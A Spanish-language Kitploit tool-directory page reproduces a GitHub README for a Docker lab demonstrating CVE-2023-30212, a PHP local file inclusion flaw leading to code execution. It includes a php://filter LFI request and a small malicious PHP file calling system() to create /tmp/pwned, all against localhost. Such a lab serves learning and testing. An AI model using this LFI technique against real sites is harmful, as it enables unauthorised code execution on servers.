Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2023-30212 — PoC para CVE-2023-30212 usando Docker | Kitploit
Herramientas/GitHubGitHub/sungmin20/cve-2023-30212
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubsungmin20/cve-2023-30212

cve-2023-30212

PoC para CVE-2023-30212 usando Docker

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

cve-2023-30212

PoC para CVE-2023-30212 usando Docker

Configuración del entorno CVE-2023-30212 e informe PoC

📌 Resumen

Este informe contiene la configuración directa de un entorno web vulnerable basado en Docker para la vulnerabilidad CVE-2023-30212 (no disponible en Vulhub), y la demostración de dicha vulnerabilidad a través de un PoC.

  • Número CVE: CVE-2023-30212
  • Descripción de la vulnerabilidad: Posibilidad de ejecución remota de código mediante LFI (Local File Inclusion) en PHP
  • Dificultad: Avanzada (entorno no disponible en Vulhub)

🔧 Configuración del entorno

1. Configuración de Dockerfile y docker-compose

  • Imagen base: php:8.1-apache
  • Copia de vulnerable.php y malicious.php al directorio /var/www/html
---
Descargar herramienta
  • Puerto 8088 expuesto para acceso externo Docker build
  • 2. Descripción de los archivos principales

    ArchivoDescripción
    vulnerable.phpArchivo PHP con vulnerabilidad LFI
    malicious.phpArchivo PHP malicioso que ejecuta comandos del sistema
    docker-compose.ymlArchivo de configuración para el contenedor
    DockerfileArchivo de configuración para la creación de la imagen Docker
    image
    image
    image
    image

    🚀 Flujo de ejecución de la vulnerabilidad (PoC)

    1. Ejecutar el contenedor

    root@kitploit:~
    docker-compose up -d
    

    Nombre del contenedor: cve-2023-30212-cve-lfi-1

    El servidor Apache se inicia y es accesible en http://localhost:8088

    2. Verificar el código fuente del archivo malicioso basado en LFI

    Llame a la siguiente URL para ver el contenido de malicious.php codificado en base64:

    root@kitploit:~
    http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php
    
    base64

    Al decodificar el resultado, se obtiene el siguiente código PHP:

    root@kitploit:~
    <?php system("touch /tmp/pwned"); ?>
    
    image

    3. Ejecución del comando y verificación del resultado

    Llame a la siguiente URL para ejecutar realmente el comando:

    root@kitploit:~
    http://localhost:8088/malicious.php
    

    Después de ejecutar el comando, debería crearse el archivo /tmp/pwned.

    root@kitploit:~
    docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp
    

    Si el archivo pwned aparece en el resultado, la prueba es exitosa.

    archivo pwned

    Resumen de resultados

    • Se logró verificar y decodificar el contenido del archivo malicioso mediante la vulnerabilidad LFI basada en php://filter
    • Se logró ejecutar comandos arbitrarios al invocar el PHP malicioso que contiene la función system()
    • PoC verificado exitosamente mediante la creación del archivo /tmp/pwned